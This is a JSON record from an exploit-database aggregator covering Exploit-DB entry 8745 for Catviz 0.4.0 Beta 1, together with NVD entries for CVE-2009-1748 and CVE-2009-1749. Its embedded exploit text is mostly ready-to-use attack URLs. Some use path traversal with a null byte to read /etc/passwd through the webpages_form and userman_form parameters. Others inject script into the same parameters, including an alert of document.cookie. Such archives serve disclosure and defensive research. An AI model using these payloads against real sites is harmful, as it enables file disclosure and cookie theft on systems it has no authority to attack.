{"id": "EDB-ID:8745", "hash": "c3b94567f6d6d1e8a58db9cf9d59b90b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "catviz 0.4.0b1 - LFI/XSS Multiple Vulnerabilities", "description": "Catviz 0.4.0b1 (LFI/XSS) Multiple Remote Vulnerabilities. CVE-2009-1748,CVE-2009-1749. Webapps exploit for php platform", "published": "2009-05-20T00:00:00", "modified": "2009-05-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/8745/", "reporter": "ByALBAYX", "references": [], "cvelist": ["CVE-2009-1748", "CVE-2009-1749"], "lastseen": "2016-02-01T08:03:58", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2016-02-01T08:03:58"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1749", "CVE-2009-1748"]}], "modified": "2016-02-01T08:03:58"}, "vulnersScore": 6.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8745/", "sourceData": "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@===C4TEAM.ORG====ByALBAYX====C4TEAM.ORG====@\n@~~=======================================~~@\n@~~=Author : ByALBAYX @\n@ @\n@~~=Website : WWW.C4TEAM.ORG @\n@ @\n@@@@@@@@@@@@@@@@@@TURKISH@@@@@@@@@@@@@@@@@@@@\n@\n@ _.--\"\"\"\"\"--._\n@ .' '.\n@ / \\\n@ ; C4TEAM ;\n@ | |\n@ | |\n@ ; ;\n@ \\ (`'--, ,--'`) /\n@ \\ \\ _ ) ( _ / /\n@ ) )(')/ \\(')( (\n@ (_ `\"\"` /\\ `\"\"` _)\n@ \\`\"-, / \\ ,-\"`/\n@ `\\ / `\"\"` \\ /`\n@ |/\\/\\/\\/\\/\\|\n@ |\\ /|\n@ ; |/\\/\\/\\| ;\n@ \\`-`--`-`/\n@ \\ /\n@ ',__,'\n@ \n@ Catviz 0.4.0 Beta 1\n@ \n@ Demo:\n@\n@ http://catviz.sourceforge.net\n@\n@\n@ LFI :/\n@\n@ http://c4team.org/ [Path] /index.php?webpages_form=../../../../../../../../../../../../../etc/passwd%00\n@\n@ http://c4team.org/ [Path] /index.php?userman_form=../../../../../../../../../../../../../etc/passwd%00\n@\n@\n@\n@ XSS :/\n@\n@\n@ http://c4team.org/ [Path] /index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>\n@\n@ http://c4team.org/ [Path] /index.php?webpages_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>\n@\n@ http://c4team.org/ [Path] /index.php?userman_form=\"><script>alert(document.cookie)</script>\n@\n@ http://c4team.org/ [Path] /index.php?webpages_form=\"><script>alert(document.cookie)</script>\n@\n@ http://c4team.org/ [Path] /index.php?userman_form='><h1>ByALBAYX</h1><div style=display:none>\n@\n@ http://c4team.org/ [Path] /index.php?webpages_form='><h1>ByALBAYX</h1><div style=display:none>\n@\n@@@:/\n\n# milw0rm.com [2009-05-20]\n", "osvdbidlist": ["54656", "54657"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:58", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in index.php in Catviz 0.4.0 beta 1 allow remote attackers to inject arbitrary web script or HTML via the (1) userman_form and (2) webpages_form parameters.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-1749", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1749", "published": "2009-05-22T11:52:00", "title": "CVE-2009-1749", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:09:58", "bulletinFamily": "NVD", "description": "Multiple directory traversal vulnerabilities in index.php in Catviz 0.4.0 Beta 1 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) webpages_form or (2) userman_form parameter.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-1748", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1748", "published": "2009-05-22T11:52:00", "title": "CVE-2009-1748", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}